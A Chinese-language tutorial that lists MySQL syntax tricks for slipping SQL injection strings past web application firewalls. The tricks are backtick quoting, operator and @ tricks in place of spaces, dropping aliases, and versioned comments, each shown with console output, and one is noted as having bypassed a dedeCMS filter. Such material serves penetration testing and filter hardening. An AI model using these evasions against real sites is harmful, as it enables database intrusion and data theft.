本文中，筆者與大家分享了幾個WAF繞過的技巧。對于一些大家都了解的技巧如：/*!*/,SELECT[0x09,0x0A-0x0D,0x20,0xA0]xx FROM 不再重造輪子。

Mysql：

tips1: 神奇的 `  (格式輸出表的那個控制符)

過空格  過一些正則。

mysql> select`version`()  
    -> ;  
+----------------------+  
| `version`()          |  
+----------------------+  
| 5.1.50-community-log |  
+----------------------+  
1 row in set (0.00 sec) 

一個更好玩的技巧，這個` 控制符可以當(dāng)注釋符用（限定條件）。

mysql> select id from qs_admins where id=1;`dfff and comment it;  
+----+  
| id |  
+----+  
|  1 |  
+----+  
1 row in set (0.00 sec)  
 `>usage : where  id =’0′`’xxxxcomment on.  

tips2:神奇的“- + .”：

mysql> select id from qs_admins;  
+----+  
| id |  
+----+  
|  1 |  
+----+  
1 row in set (0.00 sec)  
 
mysql> select+id-1+1.from qs_admins;  
+----------+  
| +id-1+1. |  
+----------+  
|        1 |  
+----------+  
1 row in set (0.00 sec)  
 
mysql> select-id-1+3.from qs_admins;  
+----------+  
| -id-1+3. |  
+----------+  
|        1 |  
+----------+  
1 row in set (0.00 sec) 

（有些人不是一直在說關(guān)鍵字怎么過？過濾一個from …    就是這樣連起來過）

tips3: @

mysql> select@^1.from qs_admins;  
+------+  
| @^1. |  
+------+  
| NULL |  
+------+ 

這個是bypass  曾經(jīng)dedeCMS filter。

或者下面這樣也是可以的：

tips4：mysql function() as xxx  也可以不用as 和空格

mysql> select-count(id)test from qs_admins;  
+------+  
| test |  
+------+  
|   -1 |  
+------+  
1 row in set (0.00 sec) 

tips5:/*![>5000]*/ 新構(gòu)造  版本號（這個可能有些過時了。）

mysql> /*!40000select*/ id from qs_admins;  
+----+  
| id |  
+----+  
|  1 |  
+----+  
1 row in set (0.00 sec)